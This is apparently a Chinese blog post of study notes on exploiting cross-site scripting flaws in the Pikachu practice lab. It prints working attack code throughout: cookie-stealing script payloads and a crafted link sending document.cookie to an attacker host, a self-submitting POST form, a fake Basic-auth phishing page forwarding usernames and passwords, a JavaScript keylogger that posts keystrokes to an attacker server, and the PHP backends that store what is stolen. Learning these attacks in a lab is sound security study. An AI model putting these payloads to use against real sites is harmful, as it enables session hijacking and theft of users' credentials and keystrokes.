前言

此为XSS漏洞学习笔记，记录XSS的学习过程，方便今后复习使用，有写的不好的地方请见谅，大佬勿喷。

GET型XSS利用

攻击流程

攻击实现

以pikachu网站的反射型XSS（GET）为例

攻击者发现在192.168.233.1的pikachu站点里发现xss反射型漏洞，且为GET型，构造获取cookie的语句，把用户访问该站点时的cookie返回给攻击者网站上搭建的pkxss后台

//攻击者后台获取cookie的php文件

<?php

include_once '../inc/config.inc.php';

include_once '../inc/mysql.inc.php';

$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){

    $time=date('Y-m-d g:i:s');

    $ipaddress=getenv ('REMOTE_ADDR');

    $cookie=$_GET['cookie'];

    $referer=$_SERVER['HTTP_REFERER'];

    $useragent=$_SERVER['HTTP_USER_AGENT'];

    $query="insert cookies(time,ipaddress,cookie,referer,useragent)

    values('$time','$ipaddress','$cookie','$referer','$useragent')";

    $result=mysqli_query($link, $query);

}

header("Location:http://192.168.233.1/pikachu/index.php");//重定向到一个可信的网站，此处直接重定向到存在XSS漏洞的网站的首页

?>

构造语句为

<script>document.location = 'http://192.168.233.151/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

插入到存在反射型XSS的文本框里并提交，成功返回到pikachu网站首页

查看攻击者获取cookie的网站，成功获取到攻击者自己的cookie

接下来，攻击者便可以把存在获取cookie的url发给用户

http://192.168.233.1/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.233.151%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

用户访问该url成功跳转到pikachu网站的首页

此时攻击者后台成功获取到用户在该网站的cookie值

最后，攻击者便可以使用该用户的身份登录该网站造成破坏。

POST型XSS利用

攻击流程

攻击实现

攻击者发现存在POST反射型XSS漏洞的网站，伪造表单自动提交页面，发给正在浏览该网站的登录用户，骗其打开，便可获取用户cookie值

<!-- 攻击者构造的表单自动提交页面 -->

<html>

<head>

<script>

window.onload = function() {

  document.getElementById("postsubmit").click();

}

</script>

</head>

<body>

<form method="post" action="http://192.168.233.1/pikachu/vul/xss/xsspost/xss_reflected_post.php">

    <input id="xssr_in" type="text" name="message" value=

    "<script>

document.location = 'http://192.168.233.151/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

    </script>"

     />

    <input id="postsubmit" type="submit" name="submit" value="submit" />

</form>

</body>

</html>

此时用户登录页面，并在页面里浏览

此时攻击者把构造好的表单自动提交页面post.html发送给用户，骗其打开

用户打开攻击者发来的url并成功跳转到pikachu首页，此时攻击者获取到了用户的cookie值，并可利用该用户身份登录该网站

此时攻击者便获取到了用户的账号:admin和密码:123456，可以使用该用户的身份登录该网站造成破坏。

钓鱼

此案例使用pikachu的存储型XSS

攻击者构建钓鱼网站，骗取用户的账号密码

//钓鱼网页

<?php

error_reporting(0);

// var_dump($_SERVER);

if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {

//发送认证框，并给出迷惑性的info

    header('Content-type:text/html;charset=utf-8');

    header("WWW-Authenticate: Basic realm='认证'");

    header('HTTP/1.0 401 Unauthorized');

    echo 'Authorization Required.';

    exit;

} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){

//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP

    header("Location: http://192.168.233.151/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}

    &password={$_SERVER[PHP_AUTH_PW]}");

}

?>

攻击者搭建获取钓鱼信息的后台

<?php

error_reporting(0);

include_once '../inc/config.inc.php';

include_once '../inc/mysql.inc.php';

$link=connect();

if(!empty($_GET['username']) && !empty($_GET['password'])){

    $username=$_GET['username'];

    $password=$_GET['password'];

    $referer="";

    $referer.=$_SERVER['HTTP_REFERER'];

    $time=date('Y-m-d g:i:s');

    $query="insert fish(time,username,password,referer)

    values('$time','$username','$password','$referer')";

    $result=mysqli_query($link, $query);

}

?>

攻击者构造语句，插入存储型XSS中

<script src="http://192.168.233.151/pkxss/xfish/fish.php"></script>

于是，每次刷新该页面都会跳出需要账号密码的输入框

当用户浏览该页面时也会跳出请求账号和密码的提示框，如果用户不注意并成功输入账号和密码后，攻击者后台便可获取到用户的账号和密码

最后后台不知道出啥问题了，一直获取不到数据，但钓鱼思路就是这样

补充：想要获取到最后钓鱼结果的可以参考下面这篇文章：

Pikachu漏洞靶场系列之XSS钓鱼攻击后续 - 云+社区 - 腾讯云 (tencent.com)

键盘记录

此案例依旧使用pikachu网站的存储型xss

攻击者编写获取键盘记录的js代码，并构造语句插入存在xss的文本框，当用户浏览该网页时，在键盘上输入的值都会被记录到攻击者的后台

/**

 * Created by runner on 2018/7/8. 
 * 获取键盘记录的js代码

 */

function createAjax(){

    var request=false;

    if(window.XMLHttpRequest){

        request=new XMLHttpRequest();

        if(request.overrideMimeType){

            request.overrideMimeType("text/xml");

        }

    }else if(window.ActiveXObject){

        var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

        for(var i=0; i<versions.length; i++){

            try{

                request=new ActiveXObject(versions[i]);

                if(request){

                    return request;

                }

            }catch(e){

                request=false;

            }

        }

    }

    return request;

}

var ajax=null;

var xl="datax=";

function onkeypress() {

    var realkey = String.fromCharCode(event.keyCode);

    xl+=realkey;

    show();

}

document.onkeypress = onkeypress;

function show() {

    ajax = createAjax();

    ajax.onreadystatechange = function () {

        if (ajax.readyState == 4) {

            if (ajax.status == 200) {

                var data = ajax.responseText;

            } else {

                alert("页面请求失败");

            }

        }

    }

    var postdate = xl;

    ajax.open("POST", "http://192.168.233.151/pkxss/rkeypress/rkserver.php",true);

    ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    ajax.setRequestHeader("Content-length", postdate.length);

    ajax.setRequestHeader("Connection", "close");

    ajax.send(postdate);

}

插入文本框的语句

<script src="http://192.168.233.151/pkxss/rkeypress/rk.js"></script>

因为为了安全考虑，所有的浏览器都约定了“同源策略”，同源策略规定，两个不同域名之间不能使用JS进行相互操作。所以攻击者获取键盘记录的后台需要开启跨域访问

如果想要跨域操作，则需要管理员进行特殊的配置。
比如通过：header(“Access-Control-Allow-Origin:x.com”)指定。

<?php

/**

 * Created by runner.han

 * There is nothing new under the sun

 */

include_once '../inc/config.inc.php';

include_once '../inc/mysql.inc.php';

$link=connect();

//设置允许被跨域访问

header("Access-Control-Allow-Origin:*");

$data = $_POST['datax'];

$query = "insert keypress(data) values('$data')";

$result=mysqli_query($link,$query);

?>

攻击者插入语句后成功在后台获取到用户的键盘输入记录

巴特西

XSS漏洞利用案例实验

前言

GET型XSS利用

攻击流程

攻击实现

POST型XSS利用

攻击流程

攻击实现

钓鱼

键盘记录

最新文章

热门文章